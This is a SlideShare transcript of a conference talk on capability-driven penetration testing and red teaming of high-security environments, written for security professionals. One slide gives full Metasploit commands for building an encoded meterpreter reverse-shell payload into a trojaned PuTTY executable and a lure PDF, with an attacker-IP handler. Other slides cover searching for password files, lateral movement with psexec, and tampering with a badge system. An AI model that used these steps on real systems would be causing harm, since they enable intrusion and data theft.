SlideShare a Scribd company logo
1 of 58
Big Bang Theory...
The Evolution of Pentesting High Security Environments
Presented By:
Joe McCray & Chris Gates
Whoami
• Joe McCray (j0emccray)
• Founder/CEO of Strategic Security
• 10+ Years Experience
– Network/Web/Mobile/Client-Server
– DoD, Federal Government, Commercial, Financial
– Specializing in High Security Environments &
Bypassing Security Solutions
– Spoken/Trained at over 200 security conferences
Whoami
• Chris Gates (CG)
– Twitter carnal0wnage
– Blog carnal0wnage.attackresearch.com
– Job Partner/Principal Security Consultant at Lares
– Affiliations  Co-Founder NoVAHackers, Attack Research, Metasploit
Project
• Previous Work
– Sr. Security Consultant – Rapid7
– Network Attack Team Lead – Applied Security Inc.
– Penetration Tester – BAH
– Computer Exploitation Technician – US Army Red Team
• Previous Talks
– Pentest Dirty Secrets -ColdFusion for Pentesters
– wXf Web eXploitation Framework -Information Gathering
– Attacking Oracle (via TNS/Web) -Client-Side Attacks
Vulnerability Driven Industry
• IT Security is focused on minimizing the presence of
vulnerabilities
J
Vulnerability Driven Industry
• Tons of Issues
– Doesn’t fix underlying problems
– Usually ignores the “low to pwned” aspect
– Focus on #’s of highs, meds, lows, and not if an
attacker can access important data and can the
organization detect it.
– Most Important:
– A vulnerability isn’t necessarily required
J
Data Driven Assessments
• Some more “forward leaning” companies perform “Data
Driven” assessments.
• Get company to identify what’s important…
• Go after it…Can I get to it?
• Vary rare to focus on detection and response along the way
C
Vulnerability Driven VS. Capability Driven
• IT Security Industry is currently focused on minimizing the
presence of vulnerabilities
• We’re recommending a change in focus to what attacker
tactics/techniques you can detect and respond to
• More importantly what level of sophistication of attacker
tactics/techniques you can detect and respond to
• We call this “Capability Driven Security Assessments”
J
Evaluating Capabilities
We’ve broken common attack tactics into 5 phases:
1. Targeting & Information Gathering
2. Initial Entry
3. Post-Exploitation
4. Lateral Movement
5. Data Exfiltration
J
The Process
Prepwork
Passive Intel
Gathering
Active Intel
Gathering
Targeting
Exploitation
C
How the Attack Works
From: Mandiant
C
Evaluating Capabilities
Within each phase we’ve got 4 levels of sophistication
Level 1: Script Kiddie
Level 2: Sys Admin
Level 3: Organized crime/hacker for hire
Level 4: State sponsored
1 2 3 4
J
Phase 1: Targeting
Determine who has what I want
Phase 1: Targeting
Determine who has access to it
C
Phase 1: Targeting
Determine who has access to it
C
Phase 2: Initial Entry
Which of these can you detect and respond to?
1. Client-Side Exploit (<1 yr old)
2. Client-Side Exploit (<90 days old)
3. Phishing for credentials
4. File Format Exploit (malicious attachment)
5. User Assist/”No Exploit” Exploit (ex: Java Applet)
6. Custom Exploit/0day
7. Phone calls
J
Phase 2: Initial Entry
Example Syntax:
Step 1: Create your own payload
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
./msfpayload windows/meterpreter/reverse_tcp R | msfencode -c 5 -e x86/shikata_ga_nai -x putty.exe -t exe >/tmp/payload.exe
Step 2: Create an evil pdf
./msfconsole
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/meterpreter/reverse_https
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME FluShotsSchedule.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > set LHOST [your attacker ip]
msf > exploit
Result: /tmp/FluShotsSchedule.pdf
Step 3: Send the evil pdf file to your client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_https
msf > set ExitOnSession false
msf > set LHOST [your attacker ip]
msf > set LPORT 443
msf > exploit –j
Step 4: Send trojaned pdf file to victim and wait for the reverse connection from the client
J
Phase 2: Initial Entry
C
Phase 2: Initial Entry
Example Syntax:
Phishing Examples
C
Phase 2: Initial Entry
Post Exploitation Levels:
1. Access (this level is all that vulnerability assessment proves)
2. Leveraged Access (this level where an attacker can go after gaining access
to a system).
3. Keys to the Kingdom (Customer gives you a specific piece of data that you
are tasked with trying to gain access to)
4. Long Term Command and Control (The primary focus here is undetected
data exfiltration)
J
Phase 3: Post-Exploitation
Privilege escalation and data mining the compromised machine
1. Simple privilege escalation attempts (ex: at command, meterpreter
getsystem, uac bypass)
2. Simple data pilfering
– dir c:*password* /s
– dir c:*pass* /s
– dir c:*.pcf /s
3. Simple persistence (ex: registry modification, simple service
creation/replacement)
4. Advanced persistence (custom backdoor)
J
Phase 4: Lateral Movement
Moving from host to host within the target network
1. Simple file transfer via admin shares, and execution via net/at commands
2. NT Resource kit tools
3. 3rd Party System Admin tools
4. Custom tools (commands built into your backdoor)
C
Phase 4: Lateral Movement
Example Syntax:
1. net use some_workstion
2. cp mybin.exe some_workstationC$tempmybin.exe
Or
3. Psexec some_workstation
Or
4. Push out agent via various update tool (altiris, Microsoft SMS, etc)
C
Phase 5: Data Exfiltration
Getting business critical data out of the network
Exfiltrate [eks-fil-treyt]. verb,:
− To surreptitiously move personnel or materials out of an area under enemy
control.
In computing terms, exfiltration is the unauthorized removal of data from a
network.
1. Simple data exfil via any port/protocol
2. Simple data exfil via HTTP/DNS
3. Exfil via HTTPS
4. Authenticated proxy aware exfil
C
Phase 5: Data Exfiltration
Easier to move things in a small packages
• RAR, ZIP, and CAB files.
• Makecab built-in to Windows
• Most systems have 7zip, winRAR, etc
– All those allow for password protected files
– Most allow you to break big files into pieces of X size
Staging areas
• Locations to aggregate data before sending it out
• Easier to track tools and stolen data
• Fewer connections to external drops
• Typically workstations – plenty of storage space
• Is it abnormal for workstations to have high bandwidth usage?
C
Phase 5: Data Exfiltration
Fancy way
C
Phase 5: Data Exfiltration
If $company has put some effort into segmentation (rare)
C
Phase 5: Data Exfiltration
What normally happens…
C
Vulnerability Driven VS. Capability Driven
• Today’s Information Assurance Programs are comprised of
– Vulnerability Management (aka patch management)
– User Awareness
– Documentation of the first 2
• Vulnerabilities are transient
• Everyday you patch, everyday there’s more to patch
• If the attacker isn’t relying on the presence of vulnerabilities in
order to make his attack work you are in for a world of hurt!
J
Vulnerability Driven VS. Capability Driven
• Instead of saying “Mr. Customer, you have 600 highs, 1200
mediums, and 5000 lows”
• We saying “Mr. Customer, you able to detect and respond to a
level 3 attack (basically organized crime)”.
• Level 1: Script Kiddie
• Level 2: Sys Admin
• Level 3: Organized crime/hacker for hire
• Level 4: State sponsored
J
Giving Customers Man Hour Metrics
• Nothing will ever STOP an attacker – the goal is to make target
difficult to attack.
• How difficult is difficult?
• At what point would an attacker move on to another vector or
another company because this target is too difficult to break
into.
• At what point in the above can/will the organization detect the
activity and respond?
J
Strategic Security, Inc. © http://www.strategicsec.com/
• End-Point Protection Stopped The Exploit
• Popular Flash, Java exploits worked, but end-point protection stopped the exploit
Example Customer Slide 1
Strategic Security, Inc. © http://www.strategicsec.com/
• Security Mechanisms that had to be bypassed during this engagement
• XXXXXXXXX Endpoint Protection
• This required custom exe compilation, encoding, embedding in spreadsheet
• 8 man hours (Level 3 Rating)
• XXXXXXXXX Web Proxy
• Used SSL Encryption
• Less than 5 minutes (Level 2 Rating)
• XXXXXXXXX Managed Security Service
• Used SSL Encryption
• Less than 5 minutes (Level 2 Rating)
Example Customer Slide 2
J
Strategic Security, Inc. © http://www.strategicsec.com/
Most Likely Attack Vectors
Keys To
The
Kingdom
External
Websites Wireless
Network
Physical
Social
Engineering
Internal
Network
Red Teaming
• Once an organization can defend/detect
against a Level 2 attacker its time to consider
Red Teaming.
C
Red Teaming
• The term Red Team originated within the
military to describe a team whose purpose is to
penetrate security of "friendly" installations,
and thus test their security measures. This
method of testing allows for the highest level
of real world attacks to be simulated and used
to expose the potential weak points of an
organization’s total Information Security
program.
Why Red Teaming
• We typically test “stovepiped” environments.
• Q1 we do network pentesting
• Q2 we do phishing
• Q3 we do wifi
• Q4 we do physical
C
Red Teaming
• Typical Electronic Pentesting:
Electronic
• Network Pentesting
• Wifi
• Web Application
• Phishing
Red Teaming
• Social Engineering
Social
• In Person Social
Engineering
• Phone Conversation
• Social Profiling
Red Teaming
• Physical Attacks
Physical
• Facility access
• Lock picking, tailgating
• Defeating Physical Controls
• Badge recovery/cloning
Why Red Teaming
• The problem is that tests can be scoped to
“pass” each of these areas when they are
tested individually, with no analysis on how
compromise of one effects another.
Red Teaming
• What is convergence
“The merging of distinct technologies,
industries, or devices into a unified whole.”
http://www.merriam-webster.com/dictionary/convergence
“The combining of different forms of
electronic technology, such as data
processing and word processing converging
into information processing.”
http://www.thefreedictionary.com/convergence
Red Teaming Convergence
Red Teaming
• Electronic/Social to Physical Compromise
• Access to company via phishing attack
– Escalate to domain administrator
– Set up shop for persistent access
• Locate physical security users/computer
– Electronically compromise badge system (ex
Lenel/CCURE)
Red Teaming
• Electronic/Social to Physical Compromise
• Add a profile/change the picture of existing
profile.
Red Teaming
• Original “Eric Smith”
Red Teaming
• New “Eric Smith” 
Red Teaming
• Electronic/Social to Physical Compromise
• With picture/info changed.
• Go to facility, get a temporary badge
• Using access to badge system upgrade the
temporary badge
Red Teaming
• Now with all access 
Red Teaming
• Physical to Electronic Compromise
• In person Physical Attack
– Either by Social Engineering
– Fake Badges
– Tailgating
– Pure physical
Red Teaming
• Physical to Electronic Compromise
Red Teaming
• Physical to Electronic Compromise
Red Teaming
• Physical to Electronic Compromise
• Once inside compromise a computer or leave a
pwn-plug for persistent electronic access.
Red Teaming
• Physical to Electronic Compromise
Red Teaming
• Physical to Electronic Compromise
Questions?
Holla @ CG....
Email:
cgates [ ] laresconsulting [ ] com
Twitter:
http://twitter.com/carnal0wnage
Work
http://lares.com
Blog
http://carnal0wnage.attackresearch.com
Strategic Security, Inc. © http://www.strategicsec.com/
Holla @ j0e....
Toll Free: 1-866-892-2132
Email: joe@strategicsec.com
Twitter: http://twitter.com/j0emccray
Slideshare: http://www.slideshare.net/joemccray
LinkedIn: http://www.linkedin.com/in/joemccray

More Related Content

What's hot

[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
CODE BLUE
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
CODE BLUE
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 

What's hot (20)

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Nessus and Reporting Karma
Nessus and Reporting KarmaNessus and Reporting Karma
Nessus and Reporting Karma
 
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
 
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
From 0 to 0xdeadbeef - security mistakes that will haunt your startupFrom 0 to 0xdeadbeef - security mistakes that will haunt your startup
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
 
Exploiting XPC in AntiVirus
Exploiting XPC in AntiVirusExploiting XPC in AntiVirus
Exploiting XPC in AntiVirus
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 

Viewers also liked

Viewers also liked (13)

Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
MSF Auxiliary Modules
MSF Auxiliary ModulesMSF Auxiliary Modules
MSF Auxiliary Modules
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 

Similar to Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Defense 2013/Shmoocon Epilogue 2013

Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
Darin Fredde
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
North Texas Chapter of the ISSA
 

Similar to Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Defense 2013/Shmoocon Epilogue 2013 (20)

For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
 
Vapt life cycle
Vapt life cycleVapt life cycle
Vapt life cycle
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security Intelligence
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APT
 
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
 
Ethical Hacking justvamshi .pptx
Ethical Hacking justvamshi          .pptxEthical Hacking justvamshi          .pptx
Ethical Hacking justvamshi .pptx
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0
 
Cyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat LandscapeCyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat Landscape
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Threat_Modelling.pdf
Threat_Modelling.pdfThreat_Modelling.pdf
Threat_Modelling.pdf
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
 
Operationalizing Security Intelligence
Operationalizing Security IntelligenceOperationalizing Security Intelligence
Operationalizing Security Intelligence
 
Tsc2021 cyber-issues
Tsc2021 cyber-issuesTsc2021 cyber-issues
Tsc2021 cyber-issues
 
chap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systemschap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systems
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
 
Adaptive Defense - Understanding Cyber Attacks
Adaptive Defense - Understanding Cyber AttacksAdaptive Defense - Understanding Cyber Attacks
Adaptive Defense - Understanding Cyber Attacks
 

More from Chris Gates

Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Chris Gates
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfSOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
Chris Gates
 
Hacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitHacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With Metasploit
Chris Gates
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
Chris Gates
 

More from Chris Gates (11)

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
 
Open Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionOpen Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon Edition
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security Environments
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfSOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
 
Hacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitHacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With Metasploit
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 

Recently uploaded

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 

Recently uploaded (20)

Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 

Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Defense 2013/Shmoocon Epilogue 2013

  • 1. Big Bang Theory... The Evolution of Pentesting High Security Environments Presented By: Joe McCray & Chris Gates
  • 2. Whoami • Joe McCray (j0emccray) • Founder/CEO of Strategic Security • 10+ Years Experience – Network/Web/Mobile/Client-Server – DoD, Federal Government, Commercial, Financial – Specializing in High Security Environments & Bypassing Security Solutions – Spoken/Trained at over 200 security conferences
